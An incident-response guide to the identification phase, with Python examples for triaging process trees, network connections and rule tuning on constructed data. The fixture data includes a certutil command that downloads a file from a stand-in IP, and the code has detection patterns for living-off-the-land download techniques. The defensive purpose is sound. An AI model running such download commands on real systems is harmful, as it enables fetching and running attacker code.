Detecting security incidents is an essential part of incident response. It can be difficult to determine whether an activity is malicious or merely suspicious. The preparation phase should have left you with properly configured and tested log sources; the identification phase then scrutinizes the alerts those sources generate to separate the pertinent ones, which signify potential security breaches, from the noise. To determine the extent of an incident, examine the identities and resources involved. Analyzing these factors helps ascertain whether an incident is actually occurring and what the appropriate response and escalation are. The main objective of the identification phase is to detect potential security incidents as soon as possible, so that damage can be mitigated and crucial systems and data safeguarded.
What are identities and assets
In incident response, the term “identity” refers to any object that is authorized to access resources. This covers not only human user accounts but also service accounts and computers, all of which carry attributes and authorizations to various assets. Identity management is an essential aspect of cybersecurity, and logging of these access transactions (logons, token requests, resource access) is vital for identifying potential security incidents.
When we refer to identities and assets, we mean, respectively, user accounts (human and non-human) and workstations, servers and other equipment. Identifying the identities and assets involved in an incident helps determine its extent and severity, and analyzing the recorded transactions offers valuable insight into what actually transpired.
By focusing closely on identity information and asset access, organizations can enhance their incident response capabilities and curtail the impact of security incidents. Remember, the aim of incident response is not merely to respond to and recover from incidents but also to prevent them from occurring in the first place. A comprehensive and properly executed identity and access management plan is vital to achieving this objective.
Incident Identification Phase
The key to identifying security incidents is being able to determine whether an alert is real or a false positive. This requires asking questions such as:
- Is a malicious actor detected on the network, or is it a legitimate IT support process?
- Is it a password spray (one or a few passwords tried against many accounts), or one user repeatedly mistyping their own password?
- Is the activity on one machine or multiple machines?
When examining an alert, it is essential to look at the process name, parent process, and any children. Additionally, reviewing all processes running on the machine can provide a clearer picture. Consider these questions when analyzing the process:
- Does it look like a normal process?
- Is it a common process on the network?
- Does it normally spawn from that parent, and does it normally spawn the children it has here?
- Does the full command line look normal for that executable? The “living off the land” technique abuses legitimate, signed system binaries (certutil, mshta, rundll32, PowerShell and the like) to download or run attacker code, so a familiar process name is not by itself reassuring.
Check the user accounts associated with the system to determine whether the activity is a false positive caused by IT support work. If an IT support account is logged in, tools and software that trigger security alarms may well have been installed legitimately. Confirm the activity with the IT support person before closing the alert, and do so through a channel other than the affected system or account: a compromised or misused support account produces exactly the same telemetry as legitimate work, so the account alone does not explain the activity away.
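The process and account questions above, worked through in code. This is an added example, not code from the original article: a small Python triage over constructed, Sysmon-style process-creation events for one host. The suspicious parent/child pairs, the living-off-the-land command-line patterns and the IT support account name are assumptions chosen for illustration; in practice they come from your own environment's baseline.

```python
"""Process-tree triage for a process-creation alert.

Added example (not code from the original article). The events are constructed,
Sysmon Event ID 1-style records; the parent/child pairs, living-off-the-land patterns
and the IT support account name are assumptions for illustration.
"""
import re
from collections import defaultdict

# Constructed telemetry for one host: pid, parent pid, account, image path, command line.
EVENTS = [
    {"pid": 400,  "ppid": 1,    "user": r"CORP\jsmith",
     "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 520,  "ppid": 1,    "user": r"NT AUTHORITY\SYSTEM",
     "image": r"C:\Program Files\RemoteAdmin\agent.exe", "cmd": "agent.exe"},   # hypothetical RMM agent
    {"pid": 1200, "ppid": 400,  "user": r"CORP\jsmith",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmd": r'"WINWORD.EXE" /n C:\Users\jsmith\Downloads\invoice.docm'},
    {"pid": 1310, "ppid": 1200, "user": r"CORP\jsmith",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"cmd.exe /c certutil -urlcache -split -f http://198.51.100.7/a.dat %TEMP%\a.dat"},
    {"pid": 1320, "ppid": 1310, "user": r"CORP\jsmith",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil -urlcache -split -f http://198.51.100.7/a.dat %TEMP%\a.dat"},
    {"pid": 2100, "ppid": 520,  "user": r"CORP\it-support",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -NoProfile -enc RwBlAHQALQBTAGUAcgB2AGkAYwBlAA=="},  # base64 UTF-16LE "Get-Service"
    {"pid": 2200, "ppid": 2100, "user": r"CORP\it-support",
     "image": r"C:\Windows\System32\msiexec.exe", "cmd": "msiexec /i agent.msi /qn"},
]

# Parent -> child pairs that are rarely legitimate: document readers and mail clients
# do not normally launch shells. Assumed baseline; extend it from your own data.
SUSPICIOUS_PARENT_CHILD = {
    ("winword.exe", "cmd.exe"), ("winword.exe", "powershell.exe"),
    ("excel.exe", "cmd.exe"), ("excel.exe", "powershell.exe"),
    ("outlook.exe", "cmd.exe"), ("outlook.exe", "powershell.exe"),
}

# Living-off-the-land command lines: signed built-ins used to download or run code.
# Labels are descriptive only, not a vendor rule set.
LOLBIN_PATTERNS = {
    "certutil download": re.compile(r"\bcertutil(\.exe)?\b.*-urlcache", re.I),
    "powershell encoded command": re.compile(r"\bpowershell.*\s-(e|ec|enc|encodedcommand)\s", re.I),
    "mshta remote content": re.compile(r"\bmshta(\.exe)?\s+https?://", re.I),
    "rundll32 javascript": re.compile(r"\brundll32.*javascript:", re.I),
    "regsvr32 remote scriptlet": re.compile(r"\bregsvr32.*/i:https?://", re.I),
}

IT_SUPPORT_ACCOUNTS = {r"corp\it-support"}  # assumed: support accounts known to the SOC


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def build_tree(events):
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e["pid"])
    return by_pid, children


def ancestry(pid, by_pid):
    """Image names from the process up to the root, e.g. ['cmd.exe', 'winword.exe', 'explorer.exe']."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def lolbin_hits(cmd):
    return [name for name, pat in LOLBIN_PATTERNS.items() if pat.search(cmd)]


def triage(pid, events):
    """Answer the process questions for one alerted pid and say what to do next."""
    by_pid, children = build_tree(events)
    proc = by_pid[pid]
    findings = []
    parent = by_pid.get(proc["ppid"])
    if parent and (basename(parent["image"]), basename(proc["image"])) in SUSPICIOUS_PARENT_CHILD:
        findings.append(f"unusual parent: {basename(parent['image'])} -> {basename(proc['image'])}")
    findings += [f"lolbin: {name}" for name in lolbin_hits(proc["cmd"])]
    for child_pid in children.get(pid, []):
        child = by_pid[child_pid]
        findings += [f"child {basename(child['image'])} lolbin: {name}" for name in lolbin_hits(child["cmd"])]
    if not findings:
        verdict = "no process indicators"
    elif proc["user"].lower() in IT_SUPPORT_ACCOUNTS:
        verdict = "confirm with IT support out of band"   # the account explains, but does not excuse, the activity
    else:
        verdict = "escalate"
    return {"pid": pid, "user": proc["user"], "chain": ancestry(pid, by_pid),
            "findings": findings, "verdict": verdict}


if __name__ == "__main__":
    for alerted in (1310, 2100):
        print(triage(alerted, EVENTS))
```

Running it on the constructed data returns two different verdicts for the same class of finding: the cmd.exe under WINWORD.EXE with a certutil download is escalated, while the encoded PowerShell run by the support account is routed to out-of-band confirmation rather than dismissed.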
Review the network activity of the device if IT involvement is ruled out. Consider these questions:
- What other IP addresses is it communicating with?
- On what ports is it communicating?
- Is it communicating to any URLs?
- Do the IP addresses resolve (reverse DNS) to names that make sense for the traffic, and does the hostname or TLS server name in the connection match them?
- Are they external, and do they show up as malicious or with low reputation scores in your threat-intelligence sources?
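The network questions above, worked through in code. This is an added example, not code from the original article: a Python summary of a constructed connection log for one suspect host that answers, per destination, where it is, on which port, whether it is external, whether it has a reverse-DNS name, whether it is on a reputation list, and whether the timing is regular enough to look like a beacon. The connection records, the reputation list and the reverse-DNS cache are constructed stand-ins for the firewall/EDR export and the live lookups you would use; the beacon thresholds are assumptions.

```python
"""Network triage for one suspect host: destinations, ports, internal/external,
reputation, reverse DNS and beacon-like timing.

Added example (not code from the original article). Connection records, the
low-reputation list and the reverse-DNS cache are constructed; thresholds are assumptions.
"""
import ipaddress
import statistics
from collections import defaultdict

# Constructed connection log for host 10.0.5.23: (seconds since first record, dst ip,
# dst port, protocol, TLS SNI or HTTP host if one was observed).
CONNS = [
    (0,    "10.0.1.10",     445, "tcp", None),                  # file server
    (3,    "10.0.1.5",      389, "tcp", None),                  # domain controller
    (60,   "198.51.100.7",  443, "tcp", "update-cdn.example"),
    (95,   "93.184.216.34", 443, "tcp", "example.com"),
    (120,  "198.51.100.7",  443, "tcp", "update-cdn.example"),
    (180,  "198.51.100.7",  443, "tcp", "update-cdn.example"),
    (241,  "198.51.100.7",  443, "tcp", "update-cdn.example"),
    (300,  "198.51.100.7",  443, "tcp", "update-cdn.example"),
    (1000, "93.184.216.34", 443, "tcp", "example.com"),
]

# Assumed local knowledge: what counts as internal address space, a threat-intel hit
# list (constructed) and a reverse-DNS cache (None = no PTR record came back).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
LOW_REPUTATION = {"198.51.100.7"}
RDNS = {"93.184.216.34": "example.com", "198.51.100.7": None}


def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def beacon_like(timestamps, min_count=4, max_cv=0.2):
    """Regular intervals (low coefficient of variation) over enough samples suggest a beacon."""
    if len(timestamps) < min_count:
        return False
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    mean = statistics.mean(gaps)
    return mean > 0 and statistics.pstdev(gaps) / mean <= max_cv


def summarize(conns):
    """One row per (ip, port, proto) with the answers to the triage questions."""
    by_dst = defaultdict(list)
    for ts, ip, port, proto, name in conns:
        by_dst[(ip, port, proto)].append((ts, name))
    report = []
    for (ip, port, proto), hits in sorted(by_dst.items()):
        external = is_external(ip)
        report.append({
            "dst": ip, "port": port, "proto": proto, "count": len(hits),
            "external": external,
            "names": sorted({n for _, n in hits if n}),
            "rdns": RDNS.get(ip) if external else None,
            "low_reputation": ip in LOW_REPUTATION,
            "beacon_like": beacon_like([t for t, _ in hits]),
        })
    return report


def prioritize(report):
    """Rank destinations by how many triage questions come back 'bad'."""
    def score(r):
        return (int(r["external"]) + int(r["low_reputation"]) + int(r["beacon_like"])
                + int(r["external"] and r["rdns"] is None))
    return sorted(report, key=score, reverse=True)


if __name__ == "__main__":
    for row in prioritize(summarize(CONNS)):
        print(row)
```

On the constructed log the external, low-reputation destination with no PTR record and near-constant 60-second intervals ranks first; the two internal servers and the single-visit external site rank last. A beacon check is only a hint: a legitimate update client also polls on a schedule, which is why the name and reputation columns are reported alongside it rather than folded into a single score.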
Malware often needs to write to disk, so look for odd files in the Downloads folder and in temporary directories. Anything newly mounted as a drive (an ISO or VHD attachment, for example) is also suspicious. Research the filename to find information on known threats, and compute the file's hash and search for it on VirusTotal. If nothing is found, treat the file as unknown rather than clean: absence from public sources is common for freshly built or targeted malware, but also for in-house tools, so the file needs further analysis (signer, strings, sandbox detonation) before a verdict.
Understand the alert’s purpose and its relationship to incident response. Review the alert’s description and event data to determine whether it is a false positive. If you believe the activity is malicious, look for it elsewhere on the network during the containment and eradication phases to remove it fully.
Incident Identification Phase – False Positives
False positives in security alerts are a recurrent occurrence; they show that the alert is firing as designed, not that it is worthless. Dismissing them entirely could lead to a loss of valuable data. Instead, tune the rule to minimize the noise and maximize the alert's value, scoping each exception to the specific account, host or tool that makes the activity legitimate and documenting why. Typically, false positives can be remedied by minor adjustments after the initial tuning. Only in extreme circumstances, where the alert generates an overwhelming volume of noise that diminishes its overall value, should disabling it be considered, as a last resort and after careful deliberation.
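Tuning rather than disabling, worked through in code. This is an added example, not code from the original article: a Python matcher that applies scoped exceptions to the output of a constructed, hypothetical rule ("remote admin tool executed on a workstation") and rejects exceptions keyed on a single attribute. The alerts, the support account and the jump-host address are constructed for illustration.

```python
"""Tuning a noisy rule with a scoped exception rather than disabling it.

Added example (not code from the original article). The alerts, rule, support account
and jump-host address are constructed for illustration.
"""

# Constructed alerts from a hypothetical rule "remote admin tool executed on workstation".
ALERTS = [
    {"host": "WS-0412", "user": r"corp\it-support", "image": "psexec.exe", "source_ip": "10.0.9.5"},
    {"host": "WS-0417", "user": r"corp\it-support", "image": "psexec.exe", "source_ip": "10.0.9.5"},
    {"host": "WS-0420", "user": r"corp\it-support", "image": "psexec.exe", "source_ip": "10.0.9.5"},
    {"host": "FS-01",   "user": r"corp\jsmith",     "image": "psexec.exe", "source_ip": "10.0.5.23"},
    {"host": "WS-0431", "user": r"corp\it-support", "image": "psexec.exe", "source_ip": "10.0.5.23"},
]

# An exception is a set of attribute/value pairs that must ALL match, plus a recorded reason.
# Scope it on everything that makes the activity legitimate: here the support account AND
# the jump host it is supposed to work from (both assumed values).
EXCEPTIONS = [
    {"match": {"user": r"corp\it-support", "image": "psexec.exe", "source_ip": "10.0.9.5"},
     "reason": "approved remote administration from the IT jump host"},
]


def too_broad(exception, min_fields=2):
    """An exception keyed on a single attribute (e.g. only the user) silences the rule for
    that whole population, including a compromised account; reject it at review time."""
    return len(exception["match"]) < min_fields


def matches(alert, exception):
    return all(alert.get(k) == v for k, v in exception["match"].items())


def tune(alerts, exceptions):
    """Return (alerts still raised, [(suppressed alert, reason), ...])."""
    for exc in exceptions:
        if too_broad(exc):
            raise ValueError(f"exception too broad: {exc['match']}")
    raised, suppressed = [], []
    for alert in alerts:
        exc = next((e for e in exceptions if matches(alert, e)), None)
        if exc:
            suppressed.append((alert, exc["reason"]))
        else:
            raised.append(alert)
    return raised, suppressed


if __name__ == "__main__":
    raised, suppressed = tune(ALERTS, EXCEPTIONS)
    print(f"raised {len(raised)}, suppressed {len(suppressed)}")   # raised 2, suppressed 3
```

The three alerts from the jump host are suppressed with a recorded reason, while the same tool run by an ordinary user, and the support account acting from a machine it should not be on, are still raised. Disabling the rule would have hidden both of those; an exception on the user alone would have hidden the second.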
Incident Identification Phase Complete
In conclusion, incident response is a critical process for organizations of all sizes to protect against cybersecurity threats and ensure business resilience. The identification phase in particular is crucial for detecting potential security incidents as soon as possible, so that damage is minimized and crucial systems and data are safeguarded.
By scrutinizing alerts from properly configured and tested log sources, analyzing identity information and asset access, and tuning false positives rather than silencing them, organizations improve their incident response capabilities and prevent future incidents. A comprehensive and well-implemented incident response plan minimizes the impact of security incidents, enhances the organization's overall security posture, and better protects its critical assets and data.